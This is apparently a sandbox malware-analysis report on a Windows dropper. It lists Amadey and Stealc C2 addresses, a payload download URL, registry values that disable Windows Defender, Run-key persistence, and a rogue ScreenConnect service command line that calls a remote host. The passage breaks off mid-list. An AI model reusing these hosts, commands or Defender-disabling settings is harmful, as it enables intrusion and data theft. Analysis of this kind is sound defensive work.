Analysis
-
max time kernel
92s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
26/03/2025, 15:45
Static task
static1
General
-
Target
df504a29ad522d6eabe6258886d296bc.exe
-
Size
1.8MB
-
MD5
df504a29ad522d6eabe6258886d296bc
-
SHA1
70d007b95628877924e5a41cceabcba93bc46a80
-
SHA256
c0472272fbb70a86f21f0b3f156a74e29c9cb3b9c56fefc5594e90879144d4b9
-
SHA512
3c356a28dbc7bd1e3c3219cb6f1c55f8ed68702d8e814d9e4de47a0fdb1ebbbaeacc1d7375b157fba7cfaf2487e2a2adde26db121c6f1c5ea1d1c8ce5085ac79
-
SSDEEP
24576:IkJ43JIC/TVPGIYZ6KQ9s7/FtxWF1nJ/zFN4qTYZkNLH/PcFPoO9Rvj2QXNij:II47/T9+oKQ+/WFXFN4qTYZeLkRouTN
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5552-1701-0x0000000000160000-0x00000000005C4000-memory.dmp healer behavioral2/memory/5552-1700-0x0000000000160000-0x00000000005C4000-memory.dmp healer behavioral2/memory/5552-1774-0x0000000000160000-0x00000000005C4000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 957d8efe21.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 957d8efe21.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 957d8efe21.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 957d8efe21.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 957d8efe21.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 957d8efe21.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 957d8efe21.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 957d8efe21.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 957d8efe21.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 957d8efe21.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4664 created 2720 4664 Exam.com 48 PID 2292 created 2720 2292 Exam.com 48 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 896b7f95b4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ df504a29ad522d6eabe6258886d296bc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e7dd32382e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8809b51fa3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dc3db1808a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 957d8efe21.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 87 2244 powershell.exe -
pid Process 3720 powershell.exe 2184 powershell.exe 4512 powershell.exe 2520 powershell.exe 2088 powershell.exe 2244 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 12 IoCs
flow pid Process 28 3256 rapes.exe 55 3256 rapes.exe 83 2088 powershell.exe 87 2244 powershell.exe 57 3256 rapes.exe 57 3256 rapes.exe 57 3256 rapes.exe 57 3256 rapes.exe 94 3256 rapes.exe 94 3256 rapes.exe 210 3256 rapes.exe 210 3256 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2684 takeown.exe 3600 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f63a82ffaf9f93d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=horipalok.top&p=8880&s=fbeb6dfe-8843-443d-87bc-0849b3d4e4ee&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAGAkr94xJOUOTb5GYPDSi8AAAAAACAAAAAAAQZgAAAAEAACAAAAChqyzOSS7vWTVGMBbj1f9pf2uiZOGTDWsoRjGIdfvX5wAAAAAOgAAAAAIAACAAAACPOdHPB78vB2RFDXSGkPyY8UyrgDLF0v9bhlmYHpKsQ6AEAABaXsbfJrwBv2s7j1TXN7Dzw4rxrNHOy88UaOkzKsKbUNM2CyMIg80A8u4YMarl%2bZFhq0kH2xisVpxw%2f1ijeTHufzSb6XHPdYh2nhUy2DCzhS%2bNFfnNuPCchv4nQQ%2fGXAAQ%2bFTXpRGQc8D9B3aBlL1phA5tO82%2fn0T7oNksdkJziWUFsbbDJRa%2bOitNq46%2bI2EMui%2bXGT5P2CQRgE3LDzNZMEqDB7Z2SwrJo5agAvJfzUn0cenf07h562Z%2bNGNGDSsbuFIwiTt0aL2sCj5ZcrYkwfxC0pDgf9o4t9QyfcyIbrO9XoTXBVvHmsPV8XdXw%2b37n1JJc58vLGMfkw00og4D4V48Ky4woq8L2Bn%2brjdBq%2ftPzpRb8C6LrtGJzNlEOeBWr2QPJt%2flcZvLzNqSR4C4u8aHaLd2pn%2bQgv0dI3zzk%2fkHlbqEVfCIoQcrG27HqD0apVFQnjCSkF1mesUyUSG23OqySAzp3wHTLj0se%2bbEoQhFoceOhXePe%2ftjxI56inK9duhyysvy4QMJ%2f3DXUd4HLQAAx53hCHNWmWTM%2fMbYBA4QNVHN%2fJkFXQwIefHX7TzOnj7aaNiSEFQw1iAMga8dcM6%2foAr7JAvpb3G%2bnvds0pDBlAN3ijPm8EAWJaq25kRiU7JVbld0uX0WRNbR06bOJSuiRqqpJOTaXlsiLdCLv3gLorZx%2fDQ5KovfgL5ccd7vvkRi6mrmEf8UHXBZv5NT0XTiMD8R4FiFovDku6MzLUe4Ehn7R4cr%2f9apk0zuJFOquFjYQKeXajRMQg%2bfrfNVJrx1zy0ntzIW6NX7rxKf8XPo%2b5LBV79cQ77yi8qtkhOvOLJ%2fqrgM7NsX4eNNWczKwY8xJeoFklj4eEOIAGSQlD7PF3paCwfjD8dSYmy3fIk3kPIJECDnpLoomXnEVukbxOPxkbMsOYW1iMc%2f%2f6FtIkruH7G0d3tJ5ldaEP7yK8C1BuMR0iZ8uTZ84qJXAhLbLOhTbUXTf0Y9yxxgSUjQ4SQzetq9C17aENJHjQB8WOJjPu3K0Lnt3V2%2fFYKEq5Hb7pvjpAw%2bXndKS9ofq39adkjRxRZIrLJjlFu%2f2xJI0SsjIpxGvs0tdGyhX7AhYbUp91u8be1bM4%2bO9e%2fnLGEqbTHpHEHSNOE19nDxwrhT4EoRRHmNxGUC9lOGRfw%2bBBKQ1a0mhvqNIbQSx0DWmB%2b%2fhiP9bZow%2f8PohZn3dmkXbEmRNtfsB4Ez5KqSPZ1FKsHVX%2bO0LbXcRe36xLvUQo6a2Bf9hLyJ89o0zoSbodijlUlygOLcNPIRVaVy2qeWjn1%2fVwtZXmzFpHFunMjFo%2bEsTrwj7II%2bZR7n1Or7tzpWsM9NtsGykheLuxkbp5WgSCMgEPj%2fhnpKCpQ%2fB8RWXL4cnKyCvbZgZI%2fnv3YUSI4WwznjtGyMW%2fH7FZhFKkVgLWvXqR%2buvaIlYHASMsr1DigzrJ9S1FwJ2H0wTqAfsmhYaBAKcLI1KBuDVb%2bzNFn4SeWgDnlIi3c2Wizrywg8vYTBf6HUg6h4ZFHDw9mL%2fPzH3Tt0amit1SiT13STgPlfD2EhZ%2bcqIG6XgN%2fCCRLIYUkY2UAAAACZ6an8qMEOoxa6twUxNJ4ga2dNgY4zFDeEaxUADQD9Qeh%2f8d9GZ2LGeXqLcu3CQ9VkBC48ed4mzdrG760w0lAS&t=purchased\"" ScreenConnect.ClientService.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8809b51fa3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e7dd32382e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 957d8efe21.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 957d8efe21.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 896b7f95b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion df504a29ad522d6eabe6258886d296bc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion df504a29ad522d6eabe6258886d296bc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dc3db1808a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 896b7f95b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8809b51fa3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dc3db1808a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e7dd32382e.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation TbV75ZR.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation WLbfHbp.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation df504a29ad522d6eabe6258886d296bc.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation tool.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 11.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 24 IoCs
pid Process 3256 rapes.exe 2200 TbV75ZR.exe 4132 8809b51fa3.exe 2204 tool.exe 4664 Exam.com 1652 WLbfHbp.exe 1784 BIm18E9.exe 1536 1cf4d08f1a.exe 2728 rapes.exe 4876 ScreenConnect.ClientService.exe 1392 ScreenConnect.WindowsClient.exe 2100 apple.exe 2868 TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE 3556 11.exe 4168 ScreenConnect.WindowsClient.exe 2856 11.exe 1584 e7dd32382e.exe 2188 483d2fa8a0d53818306efeb32d3.exe 2292 Exam.com 548 dc3db1808a.exe 5004 66db0435e2.exe 5552 957d8efe21.exe 5964 896b7f95b4.exe 6512 4bEpXMZ.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine e7dd32382e.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine dc3db1808a.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 957d8efe21.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 8809b51fa3.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 896b7f95b4.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine df504a29ad522d6eabe6258886d296bc.exe -
Loads dropped DLL 22 IoCs
pid Process 4972 MsiExec.exe 3880 rundll32.exe 3880 rundll32.exe 3880 rundll32.exe 3880 rundll32.exe 3880 rundll32.exe 3880 rundll32.exe 3880 rundll32.exe 3880 rundll32.exe 3880 rundll32.exe 3264 MsiExec.exe 4524 MsiExec.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2684 takeown.exe 3600 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 957d8efe21.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 957d8efe21.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1cf4d08f1a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341150101\\1cf4d08f1a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341160121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e7dd32382e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341520101\\e7dd32382e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dc3db1808a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341530101\\dc3db1808a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\66db0435e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341540101\\66db0435e2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\957d8efe21.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341550101\\957d8efe21.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000024103-988.dat autoit_exe behavioral2/files/0x000800000002414c-1283.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\wx5gfkua.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\wx5gfkua.newcfg ScreenConnect.ClientService.exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 3564 tasklist.exe 4380 tasklist.exe 4780 tasklist.exe 2224 tasklist.exe 6704 tasklist.exe 6732 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 5052 df504a29ad522d6eabe6258886d296bc.exe 3256 rapes.exe 4132 8809b51fa3.exe 2728 rapes.exe 2868 TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE 1584 e7dd32382e.exe 2188 483d2fa8a0d53818306efeb32d3.exe 548 dc3db1808a.exe 5552 957d8efe21.exe 5964 896b7f95b4.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 6512 set thread context of 6612 6512 4bEpXMZ.exe 278 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll msiexec.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.resources msiexec.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe msiexec.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.resources msiexec.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.en-US.resources msiexec.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File created C:\Program Files (x86)\ScreenConnect Client 